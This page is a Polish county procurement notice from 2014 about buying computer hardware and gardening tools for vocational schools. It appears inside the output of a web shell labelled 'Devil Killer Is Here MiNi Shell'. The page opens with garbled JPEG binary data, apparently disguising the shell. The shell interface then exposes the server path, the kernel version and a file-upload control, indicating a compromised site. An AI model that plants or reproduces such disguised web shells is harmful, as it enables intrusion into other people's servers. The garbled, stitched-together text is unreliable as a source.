JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141013/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141013/338218-N-2014.html

<p class="kh_header"><b>Świdwin: Doposażenie bazy dydaktycznej szkół ponadgimnazjalnych  Powiatu Świdwińskiego, w ramach projektu Najlepszy w zawodzie współfinansowanego przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego Działanie 9.2 
Programu Operacyjnego Kapitał Ludzki 2007 - 2013</b><br>
<b>Numer ogłoszenia: 338218 - 2014; data zamieszczenia: 13.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie bazy dydaktycznej szkół ponadgimnazjalnych  Powiatu Świdwińskiego, w ramach projektu Najlepszy w zawodzie współfinansowanego przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego Działanie 9.2 
Programu Operacyjnego Kapitał Ludzki 2007 - 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostarczenie sprzętu komputerowego oraz narzędzi ogrodniczych. 
Część I - Zakup oraz dostarczenie sprzętu komputerowego

1.		Listwa zasilająca przeciwprzepięciowa
 min. 5 gniazd 	6	szt.
2.		Mata elektrostatyczna
Rozmiar min. 50x60 z opaską i stosownym okablowaniem	6	szt.
3.		Tester płyty głównej komputera
Umożliwiający odczytanie komunikatów POST	6	szt.
4.		Płyta główna komputera 
Wyposażona w magistrale min:
1 x PCIe 3.0 2.0 x16 (x16 mode, blue)
1 x PCIe 2.0 x16 (black)
2 x PCIe 2.0 x1
2 x PCI
2 x SATA 6Gb s port(s), gray
4 x SATA 3Gb s port(s), blue
Posiadająca  włącznik komputera, który  jest podłączony do płyty głównej. Dzięki temu włączanie i wyłączanie zasilacza może być kontrolowane przez komponenty komputera lub oprogramowanie. Oparte na  układach scalonych o bardzo wysokiej skali integracji. W konstrukcji płyt głównych odpowiadają za zapewnienie współpracy poszczególnych elementów składających się na system komputerowy.	6	szt.
5.		Zasilacz 
moc min. 500W 
Kompatybilny z płytą główną	12	szt.
6.		Napęd DVD z nagrywarką 
SATA	6	szt.
7.		Pamięć min. 4GB
DDR3 kompatybilna z płyta główną	12	szt.
8.		Dysk twardy min.500 MB
SATA	6	szt.
9.		Karta sieciowa przewodowa
Min. 100M 1G PCI-Expres	6	szt.
10.		Karta sieciowa bezprzewodowa
PCI-Expres	6	szt.
11.		Karta graficzna
PCI-Expres	12	szt.
12.		Pamięć USB min.4 GB
min. USB2	6	szt.
13.		Kieszeń USB do dysku twardego
Kompatybilna z dyskiem twardym 	6	szt.
14.		Komplet do transmisji  Blue Tooth
Dowolny USB	6	szt.
15.		Zestaw komputerowy (monitor + stacja)	17	szt.
t	Typ 	Komputer stacjonarny. W ofercie wymagane jest podanie modelu, symbolu oraz producenta.	
	Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji obliczeniowych, dostępu do Internetu oraz poczty elektronicznej	
	Wydajność obliczeniowa	Procesor wielordzeniowy ze zintegrowaną grafiką, osiągający w teście PassMark CPU Mark wynik min. 3829 punktów	
	Pamięć operacyjna	min.8 GB DDR3 1600MHz non-ECC możliwość rozbudowy do min. 32GB.	
	Wydajność grafiki	Karta dedykowana  z własną pamięcią min. 1024 MB (pamięć własna).
Oferowana karta graficzna musi osiągać w teście PassMark Performance Test co najmniej wynik  min. 456 punktów w G3D Rating	
	Parametry pamięci masowej	Dysk min. 500GB SATA III 7200 obr.min.	
	Wyposażenie multimedialne	min. 24-bitowa karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, wewnętrzny głośnik w obudowie komputera, porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy. 	
	Karta sieciowa	10 100 1000 Mbps, Wi-Fi 802.11 b g n	
	Obudowa	Typu MiniTower z obsługą kart PCI Express wyłącznie o pełnym profilu, wyposażona w min. 4 kieszenie: 2 szt. 5,25 zewnętrzne pełnych wymiarów  i 2 szt. 3,5 wewnętrzne,
Suma wymiarów obudowy nie może przekraczać 97cm i objętości 27 litrów, waga max 10 kg,
Zasilacz o mocy max. 350W pracujący w sieci 230V 
Złącza na przednim panelu:
- 1 x czytnik kart pamięci 2 w 1 (CF MD)
- 1 x czytnik kart pamięci 2 w 1 (MS Duo  MS Pro)
- 1 x czytnik kart pamięci 2 w 1 (SM xD)
- 1 x czytnik kart pamięci 4 w 1 (SD SDHC SDXC MMC)
- 2 x USB 2.0
- 2 x USB 3.0
- 1 x wyjście słuchawkowe  głośnikowe
Złącza na tylnym panelu:
- 1 x Bluetooth 4.0 Hs
- 1 X DVI (karta graficzna)
- 1x HDMI
- 1x HDMI (karta graficzna)
- 1x RJ45 (LAN)
- 6x liniowe wyjścia AUDIO (możliwość podłączenia zestawu 7.1)
- 1x VGA (D-sub)
- 4x USB 2.0 
- 2x USB 3.0	
	Systemami operacyjny 	Zainstalowany system operacyjny typu Microsoft Windows 7 Home Premium PL (wersja 64-bitowa)  lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz obsługujący wszystkie urządzenia obsługiwane przez ww. system oraz  MS Office 2010 lub równoważny tj.  pakiet biurowy zawierający wszystkie elementy Microsoft Office  2010, w pełni obsługujący wszystkie istniejące dokumenty bez utraty jakichkolwiek ich parametrów i cech użytkowych.

Dołączone oprogramowanie na  osobnym nośniku z systemem oraz sterowniki do systemu.	
	Monitor wyświetlacz	Ekran z aktywną matrycą IPS 21.5, o jasności min. 250 cd m2, kontrast min.800:1, kąt widzenia min. (pion poziom): 160 170 stopni, czas reakcji matrycy - min. 5 ms, rozdzielczość min. 1280 x 1024 przy częstotliwości max.60 Hz, obsługa kolorów: min. 16,7 mln . Powłoka wyświetlacza  antyodblaskowa 3H. Podstawka-możliwość przechylania, obracania i regulacji wysokości; Pobór energii typowo:  26 W (max. 42W, czuwanie min 0,3 W).	
	Ergonomia	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25 dB (dokument w postaci oświadczenia producenta należy dołączyć przed podpisaniem umowy).	
	Warunki gwarancji	3 lata gwarancji producenta 
Czas reakcji serwisu - do końca następnego dnia roboczego od dnia zgłoszenia awarii.
Podmiot realizujący serwis musi posiadać certyfikat systemu zarządzania jakością wg normy ISO serii 9001 na świadczenie usług serwisowych lub równoważny w zakresie świadczenia serwisu oraz posiadać autoryzację producenta komputera. Serwis urządzeń musi być realizowany przez Autoryzowanego Partnera Serwisowego lub Producenta. W przypadku awarii dysków twardych dysk pozostaje u Zamawiającego.	
	
Warunki techniczne	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera.	
	Wymagania dodatkowe	Kabel zasilający w zestawie
Klawiatura USB przewodowa 
Mysz USB przewodowa  	
16.		Komputer - laptop 

	1	szt.
	Typ	Komputer przenośny typu notebook z ekranem max. 15,6 o rozdzielczości: HD (1366x768) w technologii LED przeciwodblaskowy. W ofercie wymagane jest podanie modelu, symbolu oraz producenta.	
	Zastosowanie	Komputer przenośny będzie wykorzystywany dla potrzeb aplikacji biurowych, dostępu do sieci intranet oraz poczty elektronicznej	
	Procesor	Procesor min. 2 rdzeniowy (1.6 GHz do 2.6 GHz, 3 MB cache), zaprojektowany do pracy w komputerach przenośnych, Zaoferowany procesor musi uzyskiwać w teście Passmark CPU Mark wynik min. 3268 punktów 	
	Pamięć operacyjna	max. 8GB (SO-DIMM DDR3 1600MHz) 	
	Parametry pamięci masowej	Dysk twardy max. 750 GB Sata	
	Karta graficzna	Karta graficzna dedykowana do laptopa DDR3, obsługa  DirectX 11.1, magistrala 64 bit, pamięć min. 1024 MB,
pamięć własna karty graficznej max. 2048 MB GDDR3	
	Wyposażenie multimedialne	Min 24-bitowa Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, wbudowane głośniki stereo.	
	Obudowa	Obudowa notebooka metalowa-wzmocniona, wykonana ze szczotkowanego aluminium, szkielet i zawiasy notebooka wykonany z wzmacnianego metalu, dookoła matrycy gumowe uszczelnienie chroniące klawiaturę notebooka po zamknięciu przed kurzem i wilgocią. Kąt otwarcia notebooka min. 180 stopni. W  obudowie  notebooka  zintegrowany  mechaniczny  przesuwny  zamek  uniemożliwiający samoczynne otwarcie się notebooka	
	Wymagania dotyczące baterii	min. 6-cell, 60WHr, Li-Ion Czas pracy na baterii min. 4 godzin. Zasilacz o mocy min. 65W	
	Zgodność z systemami operacyjnymi i standardami	Zgodność z 32-bitową i 64-bitową wersją systemu operacyjnego Microsoft Windows 7 Home Premium PL lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz obsługujący wszystkie urządzenia obsługiwane przez ww. system.	
	System operacyjny	Zainstalowany system operacyjny typu Microsoft Windows 7 Home Premium PL (wersja 64-bitowa)  lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz  obsługujący wszystkie urządzenia obsługiwane przez ww. system. 
Dołączone oprogramowanie na  osobnym nośniku z systemem oraz sterowniki do systemu.	
	Ergonomia	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25 dB (dokument w postaci oświadczenia producenta należy dołączyć przed podpisaniem umowy).	
	Waga	Waga max 2.4 kg z baterią 4-cell	
	Wsparcie techniczne producenta	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera.	
	Wymagania dodatkowe	Nagrywarka DVD+ - RW DualLayer, Wi-Fi , Bluetooth
HDMI - 1 szt. , czytnik kart pamięci - 1 szt.  
Dołączony nośnik ze sterownikami.	
	Warunki gwarancji	3-letnia gwarancja producenta świadczona na miejscu u klienta.
Czas reakcji serwisu - do końca następnego dnia roboczego.
Firma serwisująca musi posiadać ISO 9001:2000 na świadczenie usług serwisowych oraz posiadać autoryzacje producenta komputera.
Serwis urządzeń musi być realizowany przez Producenta lub Autoryzowanego Partnera Serwisowego Producenta.
W przypadku awarii dysk twardy pozostaje u Zamawiającego.	
	Interfejsy	złącza zewnętrzne USB 3.0 - 2 sztuki
złącza zewnętrzne USB 2.0 - 2 sztuki	
	Inne	Pełen komplet kabli potrzebnych do pełno funkcjonalnej pracy urządzenia.	
17.		Komputery stacjonarne

	3	szt.
	Typ 	Komputer stacjonarny. W ofercie wymagane jest podanie modelu, symbolu oraz producenta.	
	Zastosowanie	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji edukacyjnych, aplikacji obliczeniowych, dostępu do Internetu oraz poczty elektronicznej	
	Wydajność obliczeniowa	Procesor wielordzeniowy ze zintegrowaną grafiką, DDR3-1333 1600, 64 bity, (3.2-3.6 GHz, 6 MB cache)	
	Pamięć operacyjna	min.8GB DIMM DDR3 1600 MHz,	
	Wydajność grafiki	Karta dedykowana  z własną pamięcią min. 1024 MB (pamięć własna).
Magistrala 64 128 bit, obsługa  DirectX 11	
	Parametry pamięci masowej	Dysk twardy max. 1TB magnetyczny 7200 obr.min,	
	Wyposażenie multimedialne	min. 24-bitowa karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, wewnętrzny głośnik w obudowie komputera, porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy. 	
	Karta sieciowa	10 100 1000 Mbps, Wi-Fi 802.11 b g n	
	Obudowa	MiniTower z obsługą kart PCI Express wyłącznie o pełnym profilu, wyposażona w min. 4 kieszenie: 2 szt. 5,25 zewnętrzne pełnych wymiarów  i 2 szt. 3,5 wewnętrzne,
Suma wymiarów obudowy nie może przekraczać 97cm i objętości 27 litrów, waga max 10 kg,
Zasilacz o mocy max. 350W pracujący w sieci 230V 
Złącza na przednim panelu:
- 1 x czytnik kart pamięci 2 w 1 (CF MD)
- 1 x czytnik kart pamięci 2 w 1 (MS Duo  MS Pro)
- 1 x czytnik kart pamięci 2 w 1 (SM xD)
- 1 x czytnik kart pamięci 4 w 1 (SD SDHC SDXC MMC)
- 2 x USB 2.0
- 2 x USB 3.0
- 1 x wyjście słuchawkowe głośnikowe
Złącza na tylnym panelu
- 1 x Bluetooth 4.0 Hs
- 1 X DVI (karta graficzna)
- 1x HDMI
- 1x HDMI (karta graficzna)
- 1x RJ45 (LAN)
- 6x liniowe wyjścia AUDIO (możliwość podłączenia zestawu 7.1)
- 1x VGA (D-sub)
- 4x USB 2.0 
- 2x USB 3.0	
	Systemami operacyjny 	Zainstalowany system operacyjny typu Microsoft Windows 7 Home Premium PL (wersja 64 bitowa) lub równoważny tj. obsługujący wszystkie programy obsługiwane przez  ww. system, wykonujący wszystkie funkcjonalności systemu oraz obsługujący wszystkie urządzenia obsługiwane przez ww. system oraz MS Office 2010 lub równoważny tj.  pakiet biurowy zawierający wszystkie elementy Microsoft Office  2010, w pełni obsługujący wszystkie istniejące dokumenty bez utraty jakichkolwiek ich parametrów i cech użytkowych.
Dołączone oprogramowanie na  osobnym nośniku z systemem oraz sterowniki do systemu.	
	Ergonomia	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji operatora w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25 dB (dokument w postaci oświadczenia producenta należy dołączyć przed podpisaniem umowy).	
	Warunki gwarancji	3 lata gwarancji producenta 
Czas reakcji serwisu - do końca następnego dnia roboczego od dnia zgłoszenia awarii.
Podmiot realizujący serwis musi posiadać certyfikat systemu zarządzania jakością wg normy ISO serii 9001 na świadczenie usług serwisowych lub równoważny w zakresie świadczenia serwisu oraz posiadać autoryzację producenta komputera. Serwis urządzeń musi być realizowany przez Autoryzowanego Partnera Serwisowego lub Producenta. W przypadku awarii dysków twardych dysk pozostaje u Zamawiającego.	
	Warunki techniczne	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela. Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera		
18.		Drukarka laserowa (czarno-biała)	Nominalna prędkość druku min.: 30str min., rozdzielczość min.1200x1200. Gramatura papieru 60-220 g m2, pojemność pojemnika papieru min. 250 szt.  Zainstalowana pamięć min. 32 MB, maksymalny rozmiar nośnika A4, złącza zewnętrze min. USB 2.0, druk dwustronny  automatyczny.
Pełen komplet kabli potrzebnych do pełno funkcjonalnej pracy urządzenia.
Gwarancja 2 lat	1 	szt.
19.		Pendrivy	min. 8 GB	165	szt.

Część II - Zakup oraz dostarczenie narzędzi ogrodniczych 
1	Narzędzia ogrodnicze
Szpadel (4 szt.) Wygięty, stalowy trzonek pokryty PCV, hartowana głowica szpadla, rączka z tworzywa w kształcie litery Y, Ciężar  max.(g) 1870, Długość min.(mm) 1250, Szerokość głowicy min.(mm) 195
Grabie (4 szt.) do wyrównywania większych powierzchni, głowica z hartowanej stali węglowej , Waga max.(g) 428, Długość min.(mm) 205, Szerokość głowicy min. (mm) 360, 
Nożyce do żywopłotu (4 szt.) ostrza polerowane, chromowane oraz teflonowane ,  długość ostrza min.  210 mm , długość całkowita - teleskopowe rączki 580-890 mm , waga max.1750g
Sekator jednoręczny(4 szt.) lekki, odporny na rdzę, regulowany.
Sekator dwuręczny  (4 szt.)Mechanizm stopniowego cięcia, rączki i kowadełko wykonane z lekkiego, wytrzymałego włókna,  uchwyty z tworzywa SoftGrip lub równoważnego, kowadełko przytrzymuje gałęzie w trakcie cięcia, Idealny do twardych, suchych gałęzi, Ciężar max. (g) 690, Długość min. (mm) 570, 
Motyka(4 szt.) waga max. (g) 241, Długość min.(mm) 295, Szerokość głowicy min. (mm) 125, 
Opryskiwacz (1 szt.) wysokość min.(cm) 61 Szerokość min. (cm) 42, Waga max.(kg) 3,2 Pojemność min. (l) 12, Ciśnienie operacyjne (bar) 1-3, Długość metalowego zakończenia min.(cm) 60, Długość węża min.(cm) 120
Łopatka(4 szt.) do sadzenia i przesadzania roślin ogrodowych i doniczkowych. Wykonana ze stali chromowanej z wstawkami z antypoślizgowej gumy w rękojeści. Waga max. 218g
Grabie do liści -pazurki (4 szt.) długość min. (cm) 173,5, Szerokość głowicy  min.(cm) 64,6, Głębokość min.(cm) 4,2, Liczba zębów min. 25, 
Waga max.(kg) 1,
Wał ogrodowy(1 szt.)metalowy walec, wypełniony wodą lub piaskiem, z zamontowanymi kolcami, Długość  min.(cm)130, Średnica min. (cm) 52, 
Waga max.(kg)14
Piła do gałęzi (1 szt.) specjalne uzębienie zapewnia skuteczne cięcie desek i płyt,  wygodny zaczep do paska, rączka pokryta tworzywem typu SoftGrip  lub równoważnym posiadającym parametry techniczne i jakościowe co najmniej takie same jak produkt określony za pomocą nazwy produktu, ergonomiczna rękojeść z osłoną na palce, cięcie w jednym kierunku - do siebie, Ciężar max. (g) 231, Długość  min.(mm) 223, Długość ostrza min.(mm) 280, 
Szklarnia mini (1 szt.)metalowa, składana konstrukcja- wymiary min. wys.  94 dł.72 szer.50 cm-, folia ze wzmocnieniami, odporna na warunki pogodowe min. 135 gm2 pe- podwieszane drzwi zamykane na zamki- min. 2 półki- druty do mocowania do gruntu w komplecie
Taśma miernicza (4 szt.) Stalowa z możliwością blokady taśmy, min. 5m
Waga sklepowa (1 szt.)czytnik elektroniczny, wielkość min. (sz x gł x wys) 15.7 x 22.4 x 17, funkcja oszczędności baterii (waga przechodzi w stan czuwania gdy nie jest używana), waga może pracować od -10 do +50 st. C, szalka ze stali nierdzewnej, zakres pomiaru od 0 do 40 kg, dokładność 5g, zasilanie min. 230V lub akumulator min. 4V  6ah (w zestawie), min. 6 wyświetlaczy (3 z przodu i 3 z tyłu wagi), wymiary szalki min. 23 x 34 cm, ciężar min. 4,6 kg, funkcja tarowania, funkcja sumowania cen, wyświetlacz LCD, wodoszczelna klawiatura

Konewka(4 szt.) plastikowa min. 10 l	

1	komplet
2	Ph-metr glebowy
Mierzący z dokładnością do dwóch miejsc po przecinku.  Masa max. przyrządu 230 g (z baterią i sondą) .Wymiary min. 18,0 x 7,0 x 9,0 cm . Zakres pomiaru pH od 0 pH do 14 pH . Zakres pomiaru mV od -500 mV do +500 mV . Pomiar temperatury od -30°C do +130°C . Kompensacja temperatury automatyczna i ręczna od 0°C do 120°C . Rozdzielczość pH 0,01 pH - Dokładność pomiaru pH ?0,05 pH - Temperatura pracy elektrody pH od 1°C do 90°C . Rozdzielczość temp. min. 0,1°C . Dokładność pomiaru temperatury min. 1°C . Wyświetlacz ciekłokrystaliczny LCD  3.5 cyfry . Klawiatura membranowa, zasilanie max. 1 x bateria 9V. Wskaźnik wyczerpania baterii sygnalizowany automatycznie. Pobór prądu  max. ok. 8 mA . Orientacyjny czas pracy ciągłej na jednej baterii max. ok. 50 godz. Temperatura pracy od 4°C do 50°C
Gwarancja min. 1 rok	2 	szt.
3	Stojaki do tyczek
Stojak do tyczki z łapką skręcany na śruby. Uniwersalny stojak z łapką (klamrą) do tyczek geodezyjnych i tachimetrycznych pod lustro oraz łat geodezyjnych i laserowych. Stalowa, solidna konstrukcja z klamrą o silnej sprężynie utrzyma każdą tyczkę i łatę w pionie w każdych warunkach a ponadto śruby skręcające .	2 	szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 44.51.12.00-7, 44.51.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

